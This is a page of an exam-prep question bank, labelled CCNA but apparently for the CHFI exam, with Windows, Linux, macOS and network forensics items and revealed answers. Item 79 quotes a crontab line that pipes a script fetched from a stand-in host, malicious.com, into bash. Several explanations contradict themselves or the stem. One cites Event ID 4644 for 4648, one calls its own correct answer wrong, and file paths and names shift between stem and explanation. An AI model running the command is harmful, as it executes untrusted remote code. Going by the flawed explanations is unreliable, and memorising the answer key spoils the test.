Courseiva

CCNA OS and Network Forensics Questions

75 of 167 questions · Page 2/3 · OS and Network Forensics · Answers revealed

76
MCQmedium

A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?

A.Registry Run key persistence
B.Service installation
C.Scheduled task
D.Startup folder
AnswerA

The Run key is a Windows AutoStart Extensibility Point (ASEP) located in both HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, causing the referenced executable to launch each time a user logs on. An unusual entry here, often a command line pointing to a portable executable in a temp directory, is a classic persistence mechanism used by malware. Because the Run key is queried at logon and is a single value, it is one of the simplest and most frequently abused persistences in Windows, and its presence is a strong indicator of compromise when the entry is not associated with a legitimate installed program.

Why this answer

The registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' is a standard Windows Registry Run key that automatically launches specified programs when a user logs in. This is a well-known persistence mechanism used by both legitimate software and malware to maintain foothold on a system. The presence of an unusual entry here indicates an attempt to achieve persistence via the registry.

Exam trap

EC-Council CHFI often tests the distinction between user-specific (HKCU) and system-wide (HKLM) Run keys, and candidates may confuse the Run key with other persistence mechanisms like scheduled tasks or services, but the key path explicitly identifies it as a Registry Run key.

How to eliminate wrong answers

Option B is wrong because service installation uses the Service Control Manager (SCM) and registry keys under 'HKLM\System\CurrentControlSet\Services' or 'HKCU\System\CurrentControlSet\Services', not the 'Run' key. Option C is wrong because scheduled tasks are configured via the Task Scheduler (stored in %SystemRoot%\Tasks or the Task Scheduler XML files), not through the 'Run' registry key. Option D is wrong because the Startup folder is a physical folder located at '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup' (or the All Users variant), not a registry key.

77
MCQhard

A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?

A.A user account was created for backupadmin on FS01
B.A service was installed under the backupadmin account
C.An explicit credential logon was performed to access FS01 using the backupadmin account
D.The backupadmin account locked out due to multiple failed attempts
AnswerC

This option correctly identifies the event. Event ID 4644 is triggered when a process attempts to log on by explicitly supplying account credentials, commonly via RunAs, scheduled tasks, or mapped drives. Combined with logon type 3 (network logon), it indicates that the backupadmin account was explicitly used to authenticate to FS01 over the network, rather than through the interactive console.

Why this answer

Event ID 4648 with logon type 3 indicates a network logon where explicit credentials were supplied. The subject user 'CONTOSO\admin' attempted to access the target server 'FS01' using the target user 'CONTOSO\backupadmin' account, meaning the admin explicitly provided backupadmin's credentials for that network connection, rather than using their own.

Exam trap

The trap here is confusing Event ID 4648 (explicit credential logon) with account creation (4720) or lockout (4740) events, leading candidates to pick a plausible but incorrect option based on the user names involved.

How to eliminate wrong answers

Option A is wrong because Event ID 4648 does not indicate user account creation; account creation is logged with Event ID 4720. Option B is wrong because service installation is logged with Event ID 4697 or 7045, not 4648. Option D is wrong because account lockout is logged with Event ID 4740, and Event ID 4648 does not record failed attempts or lockout status.

78
MCQhard

A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)

A.It saves a copy of the application's configuration
B.It logs all network connections made by the application
C.It records the application's execution count and last run time
D.The file contains the user's password for the application
AnswerC

Prefetch is best known to forensic examiners for its run-count and timestamp metadata: every .pf file includes a 'Run Count' value and at least one 'Last Run Time' timestamp in its header. The run count indicates how many times the corresponding executable has been launched, while the last run time gives the most recent start date and time in UTC. This is the correct characteristic of Prefetch and is what analysts rely on to establish program execution frequency and recency during an investigation. The file's name itself, such as NOTEPAD.EXE-3A5F1E2D.pf, ties the metadata to a specific program.

Why this answer

Prefetch files in Windows are designed to speed up application startup by caching information about the files loaded during the first few seconds of execution. The filename includes the application name and a hash of the file path, while the internal metadata records the execution count and last run time, making option C correct.

Exam trap

The trap here is that candidates confuse prefetch files with other Windows artifacts like jump lists or registry MRU lists, assuming they store more data (e.g., passwords or network logs) than they actually do. In CHFI exam context, remember that prefetch files provide execution count and last run time only.

How to eliminate wrong answers

Option A is wrong because prefetch files do not store application configuration; configuration is typically saved in the registry (e.g., HKCU\Software) or in .ini/.xml files. Option B is wrong because network connections are logged by the Windows Filtering Platform (WFP) or firewall logs, not by prefetch files. Option D is wrong because prefetch files contain no user credentials; passwords are stored in memory, LSASS process, or credential manager, not in prefetch artifacts.

79
MCQmedium

During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?

A.Persistence mechanism to maintain access
B.Log cleanup tool
C.System backup script
D.Software update process
AnswerA

The five-minute cron interval re-executes a remote payload via curl piped to bash, so the implant reinstalls itself after reboots or kills. This satisfies the attacker's need to retain access, making it a persistence mechanism rather than one-off execution.

Why this answer

The crontab entry executes a command every 5 minutes that downloads and runs a script from a remote server. This is a classic persistence technique used by attackers to ensure that even if the initial access vector is removed, the malicious code will be re-executed on a regular schedule, maintaining their foothold on the system.

Exam trap

The EC-CHFI exam often tests the distinction between legitimate administrative tasks (like backups or updates) and malicious persistence mechanisms, where the key differentiator is the use of an untrusted external source and the 'curl | bash' pattern that executes arbitrary code without verification.

How to eliminate wrong answers

Option B is wrong because log cleanup tools typically use commands like 'rm' or 'truncate' on log files, not 'curl' to fetch external scripts. Option C is wrong because system backup scripts usually involve 'rsync', 'tar', or 'dd' to local or trusted storage, not downloading and executing arbitrary code from an external URL. Option D is wrong because legitimate software update processes use signed packages, checksums, and trusted repositories (e.g., 'apt-get update' or 'yum update'), not an unverified 'curl | bash' from a suspicious domain.

80
MCQhard

An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?

A.Kernel rootkit
B.Web shell
C.SSH key backdoor
D.Cron-based persistence
AnswerD

Cron-based persistence occurs when an attacker adds a job to a user's crontab, /etc/cron.d/, or an /etc/cron.* directory so that the system executes a reverse shell, beacon, or re-implant command at regular intervals. The job runs with the crontab owner's privileges, survives reboots, and can be hidden with output redirection; a finding of a suspicious timer entry is strong evidence of this persistence technique.

Why this answer

Cron is a Linux job scheduler that executes tasks at specified intervals. A cron job running every minute from /tmp indicates an attacker has added a persistent scheduled task to maintain access, which is a classic example of cron-based persistence. This technique leverages the cron daemon (crond) to re-execute malicious code automatically, ensuring the attacker's foothold survives reboots.

Exam trap

This question tests the distinction between user-space persistence mechanisms (like cron) and kernel-level or network-accessible backdoors. Candidates may confuse cron jobs with rootkits or web shells due to overlapping goals of maintaining access.

How to eliminate wrong answers

Option A is wrong because a kernel rootkit operates at the kernel level, modifying system calls or kernel modules to hide processes or files, not by adding user-space cron jobs. Option B is wrong because a web shell is a script (e.g., PHP, ASP) uploaded to a web server's accessible directory to execute commands via HTTP, not a cron job in /tmp. Option C is wrong because an SSH key backdoor involves placing an attacker's public key in ~/.ssh/authorized_keys to allow passwordless login, not scheduling a recurring script via cron.

81
MCQeasy

In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?

A.syslog
B.FSEvents
C..plist files
D.Unified logging
AnswerD

Unified logging is the modern, centralized logging architecture on macOS, introduced in macOS 10.12, which aggregates all system and user-level log messages into a high-performance, structured data store accessible via the `log` command and Console app. It captures high-level forensic events such as logon/logoff, application launches, and background daemon activity, along with rich metadata like timestamps, process IDs, and privacy-annotated content. This makes Unified logging the authoritative artifact for investigating high-level system events because it provides a unified, queryable, and tamper-resistant timeline of system activity.

Why this answer

Unified logging is the correct answer because it is the comprehensive logging system in macOS that captures high-level system events such as application launches and user logins, providing a timeline for forensic analysis. FSEvents, on the other hand, only records file system changes at the directory level.

Exam trap

Candidates may incorrectly assume that FSEvents records high-level system events due to its name, but it only captures file system changes. Unified logging is the primary source for application launches and user logins.

How to eliminate wrong answers

Option A is wrong because syslog is a legacy Unix logging system that collects kernel and application messages but does not specifically track high-level system events like application launches or user logins in a structured timeline; it is more generic and less forensically focused on user actions. Option C is wrong because .plist files are property list files used for storing application preferences and configuration data, not for logging system events or providing a timeline of user activity. Option D is wrong because Unified logging (os_log) is the modern macOS logging framework that captures detailed debug and system messages, but it is not designed to provide a persistent, high-level timeline of events like FSEvents; it is more granular and ephemeral unless specifically configured for persistence.

82
Multi-Selectmedium

A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?

Select 3 answers
A./home/compromised_user/.bash_history
B./etc/shadow
C./var/log/auth.log
D.Cron job entries in /etc/crontab
E.Web server access logs (e.g., /var/log/apache2/access.log)
AnswersA, C, E

Bash history is the strongest indicator of the attacker's hands-on-keyboard activity after an initial foothold is established, recording the exact commands typed into an interactive shell such as ssh. Because it contains a chronological command sequence, it can reveal what binaries were downloaded, permissions changed, persistence mechanisms planted, and data exfiltrated. Although a sophisticated attacker may clear or disable history, its presence in this scenario makes it the definitive artifact for reconstructing post-exploitation actions.

Why this answer

Option A, /home/compromised_user/.bash_history, is correct because the shell history file records the exact commands the attacker typed after gaining access, directly revealing post-exploitation activities such as reconnaissance, privilege escalation attempts, and persistence commands. Option C, /var/log/auth.log, is correct because it captures authentication events including sudo usage, su attempts, SSH logins, and PAM failures, which help establish how the attacker escalated privileges or moved laterally after the initial web compromise. Option E, web server access logs (e.g., /var/log/apache2/access.log), is correct because they record HTTP requests with source IPs, URIs, and status codes, allowing the investigator to identify the malicious request that exploited the web application and thus the entry point.

Option B, /etc/shadow, is not a priority artifact here because it only stores password hashes and does not by itself show attacker activity or entry vectors. Option D, cron job entries in /etc/crontab, is not among the top three because while cron can indicate persistence, it is less directly tied to identifying the entry point and immediate post-exploitation actions than the history, auth, and access logs.

Exam trap

EC-Council often tests the distinction between artifacts that record past events (logs, history) versus configuration files that define system behavior (shadow, crontab), leading candidates to mistakenly choose /etc/shadow or cron entries as forensic evidence of attacker actions.

83
Multi-Selectmedium

Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)

Select 2 answers
A.tcpdump
B.Autopsy
C.Volatility
D.dd
E.Wireshark
AnswersA, E

tcpdump is a command-line packet capture tool that uses the libpcap library to intercept and display network packets transiting a specific interface. It supports powerful Berkeley Packet Filter (BPF) syntax for targeted capture and can write raw packets to a pcap file, preserving the exact frame traversal timing and payloads crucial for reconstructing network events. Its headless, scriptable nature makes it the de facto standard for remote or unattended network forensics collection.

Why this answer

tcpdump (A) is a command-line packet capture and analysis tool that uses libpcap to intercept and decode live network traffic, making it a staple for network forensics. Wireshark (E) is the de facto GUI protocol analyzer that captures packets and provides deep dissection of hundreds of protocols, so it is also a core network forensics tool. By contrast, Autopsy (B) is a disk/image forensics platform for file system and artifact analysis, Volatility (C) is a memory forensics framework for RAM dumps, and dd (D) is a low-level imaging/duplication utility — none of these are primarily used to capture or analyze network traffic.

Exam trap

The CHFI exam often tests the distinction between network forensics tools (which capture/analyze packets) and host-based forensics tools (which analyze disks, memory, or files), leading candidates to mistakenly select Autopsy or Volatility as network tools.

84
MCQmedium

A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?

A.%APPDATA%\Mozilla\Firefox\Profiles\
B.%WINDIR%\System32\config\
C.%USERPROFILE%\Favorites\
D.%LOCALAPPDATA%\Google\Chrome\User Data\Default\History
AnswerD

%LOCALAPPDATA%\Google\Chrome\User Data\Default\History is the precise path to Chrome's SQLite database that stores browsing history. This file contains multiple key tables, including 'urls' and 'visits', which record the full URL, visit time, page title, and transition type (e.g., typed, link, or reload). Because Chrome locks the file while running, a forensic examiner should make a forensic copy via a live acquisition tool or volume shadow copy before analysis, then examine it with SQLite forensics tools to recover the user's browsing activity.

Why this answer

Chrome stores its browsing history in a SQLite database file named 'History' located under the user's local app data directory. The full path is %LOCALAPPDATA%\Google\Chrome\User Data\Default\History. This file contains tables such as 'urls' and 'visits' that record all visited URLs, timestamps, and visit counts.

Exam trap

EC-Council often tests the distinction between browser-specific storage paths, and the trap here is that candidates confuse the Chrome history location with Firefox's profile path or Internet Explorer's Favorites folder, leading them to pick Option A or C.

How to eliminate wrong answers

Option A is wrong because %APPDATA%\Mozilla\Firefox\Profiles\ is the default location for Firefox profile data, not Chrome. Option B is wrong because %WINDIR%\System32\config\ stores Windows system registry hives (e.g., SAM, SECURITY, SOFTWARE), not browser history. Option C is wrong because %USERPROFILE%\Favorites\ is the default location for Internet Explorer favorites/bookmarks, not Chrome history.

85
MCQeasy

A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?

A.Service installation
B.Account creation
C.Brute-force password attack
D.Successful logon by the user
AnswerC

Multiple rapid Event ID 4625 entries in the Windows Security log are a hallmark indicator of a brute-force password attack. Each 4625 represents a failed logon attempt, and when an attacker submits numerous password guesses for the same account or from the same source IP in a short time, the log reveals a high volume of these failures. Analysts can correlate timestamps, source addresses, and target usernames to distinguish this systematic guessing from legitimate but occasional mistyped passwords.

Why this answer

Event ID 4625 is a Windows Security log event that records failed logon attempts. When multiple 4625 events appear for the same user account within a few seconds, it indicates a high volume of authentication failures in a short time window, which is the classic signature of a brute-force password attack. The rapid succession of failures rules out accidental mistypes and points to an automated or manual attempt to guess the password.

Exam trap

EC-CHFI often tests the distinction between Event ID 4625 (failed logon) and Event ID 4624 (successful logon), and the trap here is that candidates may confuse the event ID numbers or misinterpret a burst of failures as a successful logon or account creation.

How to eliminate wrong answers

Option A is wrong because service installation is logged under Event ID 7045 (Service Control Manager) or 4697 (Security), not 4625, and does not generate multiple failed logon events. Option B is wrong because account creation is recorded as Event ID 4720 (Security) or 624 (Security), not 4625, and would appear as a single event, not multiple failures. Option D is wrong because a successful logon is recorded as Event ID 4624, not 4625, and would show a single success event, not a burst of failures.

86
MCQhard

A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?

A.The path is not typical for svchost.exe, which resides in System32
B.Run keys are only for startup programs, not services
C.The run key is disabled in Windows 10
D.The registry value name 'UpdateService' is too generic
AnswerA

Svchost.exe is a critical Windows service host process that must reside in C:\Windows\System32 (or SysWOW64 on 64-bit systems for 32-bit services). A legitimate svchost.exe never runs from a user profile directory, such as C:\Users\<username>\AppData\Roaming, because that would violate Windows binary protection and signature requirements. The unexpected path alone is a strong indicator of malware, as attackers often name rogue executables svchost.exe to blend in with legitimate processes while locating them in writable, non-standard folders.

Why this answer

The legitimate svchost.exe is a critical Windows system binary located in C:\Windows\System32. An executable named svchost.exe running from C:\Users\Public\ is a classic masquerading technique used by malware to evade detection by mimicking a trusted process name while residing in a user-writable, non-standard directory. This path deviation is the primary red flag because system processes should never execute from user profile or public folders.

Exam trap

In CHFI exams, a common trap is the misconception that any svchost.exe outside System32 is automatically malicious, but the real forensic indicator is the path anomaly. Candidates may overlook this and focus on the generic name or the fact that Run keys are for programs, not services, missing the core indicator of process masquerading.

How to eliminate wrong answers

Option B is wrong because Run keys are indeed used to launch programs at user logon, and while they are not for Windows services, malware often uses them to achieve persistence by executing a malicious binary; the fact that it's not a service does not make the entry less suspicious. Option C is wrong because Run keys are fully functional in Windows 10 and are a common persistence mechanism; they are not disabled by default. Option D is wrong because while 'UpdateService' is generic, the suspicious element is the executable path, not the name; attackers frequently use generic names to blend in, so a generic name alone is not a reliable indicator of compromise.

87
Multi-Selecthard

A network forensic analyst is investigating a suspected data exfiltration incident. The analyst captures live traffic and wants to identify covert channels that might be used to transfer data out of the network. Which two of the following techniques are MOST likely to indicate a covert channel? (Choose two.)

Select 2 answers
A.ARP requests broadcast to the local subnet to resolve IP addresses to MAC addresses.
B.TCP SYN packets sent to multiple ports on a single host during a port scan.
C.ICMP echo request packets with large payloads that contain non-standard data.
D.DNS queries with unusually long subdomains containing encoded data.
E.HTTP POST requests to a known legitimate website with normal-sized payloads.
AnswersC, D

ICMP tunneling can be used to exfiltrate data by embedding it in the payload of ICMP echo requests or replies. Legitimate ICMP packets typically have small, predictable payloads (e.g., 32 bytes of data). Large or non-standard payloads containing encoded data are a hallmark of ICMP covert channels. This allows attackers to bypass firewalls that permit ICMP but do not inspect payloads deeply.

Why this answer

Covert channels often exploit protocols that are commonly allowed through firewalls, such as DNS and ICMP. Long, encoded DNS subdomains suggest DNS tunneling, while ICMP packets with large, non-standard payloads indicate ICMP tunneling. Both techniques can transfer data stealthily.

The other options describe normal traffic or reconnaissance activities that do not involve hiding data within protocol fields.

Exam trap

The trap here is focusing on common malicious activities like port scanning or suspicious HTTP traffic, while overlooking that covert channels specifically involve hiding data within allowed protocols such as DNS or ICMP.

88
MCQhard

During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?

A.7045
B.4648
C.4720
D.4624
AnswerA

Event ID 7045 is logged by the Service Control Manager when a new service is installed on the system. In a compromise investigation, this event is a primary indicator because attackers frequently install persistent services, such as backdoors or kernel drivers, using tools like `sc` or PowerShell. The event payload includes the service name, binary path, service type, and start mode, enabling an investigator to trace the exact executable that was added. That is why 7045 is the correct answer for identifying a newly installed service during forensic examination.

Why this answer

Event ID 7045 is logged in the System event log when a new service is installed on a Windows system. This event captures the service name, binary path, and service type, making it the primary forensic artifact for identifying a malicious DLL registered as a service under HKLM\SYSTEM\CurrentControlSet\Services.

Exam trap

EC-Council often tests the distinction between System log events (7045) and Security log events (4648, 4720, 4624), trapping candidates who confuse service installation with authentication or account management events.

How to eliminate wrong answers

Option B (4648) is wrong because Event ID 4648 is a Security log event for explicit credential usage (e.g., RunAs), not service installation. Option C (4720) is wrong because Event ID 4720 is a Security log event for user account creation, not service installation. Option D (4624) is wrong because Event ID 4624 is a Security log event for successful logon, not service installation.

89
MCQmedium

A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?

A..plist files
B.FSEvents
C.Unified logging (log command)
D.Console.app logs
AnswerC

Unified logging is the correct source because macOS's centralized logging system, introduced in macOS 10.12, captures all system, process, kernel, and user-level log messages through the os_log API. The `log` command (e.g., `log show`, `log collect`, `log stream`) provides forensic access to these persisted logs, including the compressed .tracev3 files in `/var/db/diagnostics`. This data, complete with precise timestamps and metadata, is exactly what an examiner needs for analyzing system events on a modern Mac.

Why this answer

Unified logging (log command) is the correct answer because macOS has consolidated all system and user-level logs into a single, high-performance unified logging system since macOS 10.12 (Sierra). This system captures kernel events, application launches, and other activities in a structured, binary format that can be queried using the 'log' command-line tool or the Console app. It is the primary and most comprehensive source for forensic analysis of system activity on modern macOS systems.

Exam trap

EC-Council often tests the misconception that Console.app is a separate logging system, when in fact it is merely a GUI front-end to the same unified logging system, and candidates may overlook the 'log' command as the primary forensic tool for accessing raw log data.

How to eliminate wrong answers

Option A is wrong because .plist files are property list files used for storing configuration settings and application preferences, not system logs that record dynamic activities like application launches or kernel events. Option B is wrong because FSEvents is a file system event notification framework that logs directory-level changes (e.g., file creation, modification, deletion) for backup and indexing purposes, not application launches or kernel events. Option D is wrong because Console.app is a graphical interface that displays logs from the unified logging system, but it is not a logging system itself; the underlying data source is still the unified log, and Console.app does not provide the raw, queryable log data that the 'log' command does.

90
MCQmedium

An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?

A./proc/[pid]/maps
B./proc/[pid]/status
C./proc/[pid]/environ
D./proc/[pid]/cmdline
AnswerD

/proc/[pid]/cmdline is the correct source because it exposes the process's original argv array, exactly as passed to execve, with each argument separated by a null byte. This file is typically read with a tool like 'tr' or by replacing null bytes with spaces to reconstruct the full command line, including the executable path, options, and arguments. However, note that for kernel threads or zombie processes the file may appear empty.

Why this answer

/proc/[pid]/cmdline contains the exact command-line arguments used to start the process, stored as null-separated strings. This allows an analyst to see how the binary was invoked, including any flags or parameters, which is critical for identifying malicious or suspicious behavior.

Exam trap

EC-Council often tests the distinction between /proc/[pid]/cmdline (command-line arguments) and /proc/[pid]/environ (environment variables), as candidates frequently confuse the two when asked about process startup details.

How to eliminate wrong answers

Option A is wrong because /proc/[pid]/maps shows memory-mapped regions (e.g., libraries, heap, stack) for the process, not its startup arguments. Option B is wrong because /proc/[pid]/status provides process state, UID, GID, and other metadata, but does not include command-line arguments. Option C is wrong because /proc/[pid]/environ contains the environment variables inherited by the process at startup, not the command-line invocation.

91
MCQmedium

A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?

A.nmap
B.iptables
C.tcpdump
D.Wireshark
AnswerB

iptables is the user-space front-end for the Linux kernel's netfilter firewall framework, and it directly manipulates packet filtering rules in the INPUT, FORWARD, and OUTPUT chains. An administrator can immediately block a brute-forcing host by adding a rule such as `iptables -A INPUT -s <offending-IP> -j DROP`, which causes all subsequent packets from that source to be discarded without reaching the authentication service. This makes iptables the correct tool for actively mitigating an active attack seen in /var/log/auth entries, and rules can be persisted with `iptables-save` and restored on boot.

Why this answer

B (iptables) is correct because it is a Linux firewall utility that can create rules to drop or reject incoming packets from a specific IP address. By adding a rule such as `iptables -A INPUT -s <IP> -j DROP`, the administrator can immediately block all further traffic from that IP, preventing additional brute-force attempts.

Exam trap

EC-Council often tests the distinction between network analysis tools (tcpdump, Wireshark, nmap) and security enforcement tools (iptables), leading candidates to confuse packet capture with packet filtering.

How to eliminate wrong answers

Option A (nmap) is wrong because it is a network scanning tool used for discovering hosts and services, not for blocking traffic. Option C (tcpdump) is wrong because it is a packet capture and analysis tool, not a firewall or access control mechanism. Option D (Wireshark) is wrong because it is a GUI-based packet analyzer used for deep inspection of network traffic, not for implementing packet filtering or blocking rules.

92
MCQmedium

A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?

A.A logon attempt failed
B.A user account was created
C.A service was installed
D.A scheduled task was created
AnswerC

Event ID 7045 is generated by the Service Control Manager (SCM) in the System log whenever a service is newly installed on a Windows machine, making it a reliable indicator of service installation. The event displays the service name, image path, service type, start type, and service account — details that help an analyst identify persistence mechanisms or malicious services. For example, a service pointing to a DLL in a user-writable Temp folder would be highly suspicious.

Why this answer

Event ID 7045 in the Windows System event log is specifically generated when a new service is installed on the system. The forensic analyst found a suspicious service named 'SrvMon', and the presence of this event at the time of compromise directly indicates that the service was installed, making option C correct.

Exam trap

The trap here is that candidates confuse Event ID 7045 with security-related events (like logon or account creation) because they occur in the same timeframe, but 7045 is strictly a System log event for service installation, not a Security log event.

How to eliminate wrong answers

Option A is wrong because failed logon attempts generate Event ID 4625 (Security log), not Event ID 7045. Option B is wrong because user account creation generates Event ID 4720 (Security log), not Event ID 7045. Option D is wrong because scheduled task creation generates Event ID 4698 (Security log) or Task Scheduler operational log events, not Event ID 7045.

93
MCQmedium

A security analyst reviews Windows Security Event Logs and finds multiple Event ID 4625 entries from a single source IP address targeting various usernames. Which type of attack is MOST likely occurring?

A.Password spraying attack
B.Brute-force attack on a single account
C.Pass-the-hash attack
D.Kerberoasting attack
AnswerA

Password spraying is a low-and-slow attack in which an adversary chooses a handful of common passwords and tries them individually across many user accounts from a single source IP. In Windows Security logs this manifests as multiple Event ID 4625 failed-logon events with different account names but the same source workstation/IP and a common failure code such as 0xC000006D, often within a short window. Because each account is hit only once or twice, the total event volume stays low, evading threshold-based brute-force detection while still matching the observed pattern of many usernames from the same source.

Why this answer

Event ID 4625 indicates a failed logon attempt. When multiple usernames are targeted from a single source IP, it suggests the attacker is trying a small set of common passwords against many accounts to avoid account lockout thresholds. This is the hallmark of a password spraying attack, which differs from a brute-force attack that focuses on many passwords for one account.

Exam trap

EC-Council often tests the distinction between 'many passwords, one user' (brute-force) and 'few passwords, many users' (password spraying), and the trap here is that candidates see multiple failed logons and immediately think brute-force, overlooking the pattern of multiple usernames from a single IP.

How to eliminate wrong answers

Option B is wrong because a brute-force attack on a single account would show repeated 4625 events for the same username, not multiple different usernames. Option C is wrong because a pass-the-hash attack uses NTLM hash values to authenticate without needing the plaintext password, and it typically results in successful logon events (Event ID 4624), not a series of failed logons. Option D is wrong because Kerberoasting targets service accounts by requesting Kerberos service tickets (TGS-REQ) and does not generate Event ID 4625; it instead produces Event ID 4769 with specific attributes.

94
Multi-Selecteasy

Which TWO of the following are typical sources of evidence for network forensics? (Select TWO.)

Select 2 answers
A.Windows registry hives
B.bash_history
C.Firewall logs
D.Prefetch files
E.Packet capture (pcap) files
AnswersC, E

Firewall logs are a cornerstone of network forensics because they contain timestamped records of each connection attempt, including source and destination IP addresses, ports, protocol, and the action taken (allow, deny, or drop). These logs enable investigators to reconstruct attack paths, spot port scans, and identify successful or blocked outbound communications. They provide metadata about network transactions, even though they do not capture payloads.

Why this answer

Firewall logs (C) are a canonical network-forensics source because they record connection metadata such as source/destination IP addresses, ports, protocol, timestamps, and allow/deny actions, which lets an investigator reconstruct traffic flows and identify blocked or permitted communications. Packet capture (pcap) files (E) are also a core network-forensics source because they contain the actual captured frames/packets (e.g., from tcpdump/Wireshark), enabling deep protocol-level analysis of payloads, sessions, and anomalies. The other options are host-based artifacts rather than network evidence: Windows registry hives (A) store OS and application configuration, bash_history (B) records shell commands executed by a user, and Prefetch files (D) are Windows execution artifacts showing program run times and loaded modules.

Exam trap

The trap here is that candidates confuse host-based artifacts (registry, bash_history, Prefetch) with network-based evidence, failing to distinguish between evidence collected from a single endpoint versus evidence collected from network infrastructure or traffic captures.

95
MCQmedium

An incident responder finds a suspicious LNK file in a user's Startup folder on a Windows system. The LNK file's target is "C:\Windows\System32\rundll32.exe" with a command-line argument "javascript:" followed by encoded text. What is the most likely purpose of this shortcut?

A.A shortcut to a network resource that failed
B.Legitimate update mechanism for Microsoft Office
C.A user-created automation script for daily tasks
D.A malicious persistence mechanism to execute payload via script
AnswerD

This is a classic Living-off-the-Land (LOLBin) technique: rundll32.exe, a signed Windows binary, can be abused to execute JavaScript via its exported functions, allowing malware to run under a legitimate process name. The .lnk file acts as a persistence mechanism, typically placed in the Startup folder or run key, and launches the JavaScript payload at logon to download and execute additional malware. This matches MITRE ATT&CK T1218.011, using a trusted binary to evade detection and achieve persistence.

Why this answer

The LNK file targets rundll32.exe with a JavaScript command-line argument, which is a known technique for executing arbitrary script code without writing a traditional executable to disk. This is commonly used by malware to establish persistence by placing the shortcut in the Startup folder, ensuring the script runs each time the user logs in.

Exam trap

The trap here is that candidates may assume rundll32.exe is only for DLL execution and overlook its ability to run script protocols, leading them to dismiss the malicious intent and choose a benign option like a legitimate update or automation script.

How to eliminate wrong answers

Option A is wrong because a shortcut to a failed network resource would not use rundll32.exe with a JavaScript argument; it would point to a UNC path or network drive. Option B is wrong because legitimate Microsoft Office updates do not use LNK files in the Startup folder with JavaScript payloads; they use Windows Update or Office Click-to-Run services. Option C is wrong because a user-created automation script would typically be a .bat, .ps1, or .vbs file, not a LNK file invoking rundll32.exe with encoded JavaScript, which is a hallmark of malicious obfuscation.

96
MCQeasy

A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?

A.The user successfully logged on from a remote workstation
B.A brute-force password attack is occurring against that account
C.The user's account was created
D.A service was installed on the system
AnswerB

Event ID 4625 records failed logon attempts, and repeated occurrences against one account from a single remote IP within a short window indicate an attacker systematically guessing credentials. This satisfies the stem's brute-force pattern, distinguishing it from isolated mistyped passwords or lockout events (4740), which Microsoft Entra ID or local policy would log separately.

Why this answer

Event ID 4625 indicates a failed logon attempt. When this event is logged repeatedly for the same user account from a single remote IP address within a short timeframe, it is a classic indicator of an automated brute-force password attack, where an attacker tries many passwords against that account in rapid succession.

Exam trap

The trap here is that candidates may confuse Event ID 4625 with a successful logon (4624) or think it indicates account creation, but the CHFI exam tests the precise mapping of Event IDs to security events to catch those who rely on vague memory rather than exact knowledge.

How to eliminate wrong answers

Option A is wrong because Event ID 4625 specifically denotes a failed logon, not a successful one (which would be Event ID 4624). Option C is wrong because account creation is logged as Event ID 4720, not 4625. Option D is wrong because service installation generates Event ID 4697 (or 7045 in the System log), not 4625.

97
MCQmedium

Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?

A.Port scanning
B.NetFlow analysis
C.Signature-based detection
D.Deep packet inspection
AnswerB

NetFlow analysis is a network forensic technique that parses flow records—aggregated summaries of communication sessions containing source/destination IP addresses, ports, protocol, timestamps, and byte counts—exported by routers or switches. These records allow investigators to reconstruct traffic patterns and detect anomalies (e.g., exfiltration, beaconing) without inspecting packet payloads. Its strength lies in scalability and historical visibility, making it the correct technique for analyzing flow.

Why this answer

NetFlow analysis is the correct technique because it focuses on collecting and analyzing IP traffic flow metadata (e.g., source/destination IPs, ports, protocols, packet counts) to detect patterns and anomalies. Tools like SiLK and nfdump are specifically designed to process NetFlow data, making this the precise match for the question's description.

Exam trap

Candidates often confuse 'analyzing traffic flow' with 'deep packet inspection' because both involve network traffic, but only NetFlow focuses on flow metadata without payload examination.

How to eliminate wrong answers

Option A is wrong because port scanning is an active reconnaissance technique that probes open ports on a target system, not a passive analysis of network traffic flows. Option C is wrong because signature-based detection relies on predefined patterns (e.g., Snort rules) to identify known threats, not on flow-level metadata analysis for anomalies. Option D is wrong because deep packet inspection (DPI) examines the full payload of packets, including application-layer data, whereas flow analysis only looks at packet headers and aggregated flow records.

98
MCQmedium

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

A.7045
B.4624
C.4648
D.4720
AnswerA

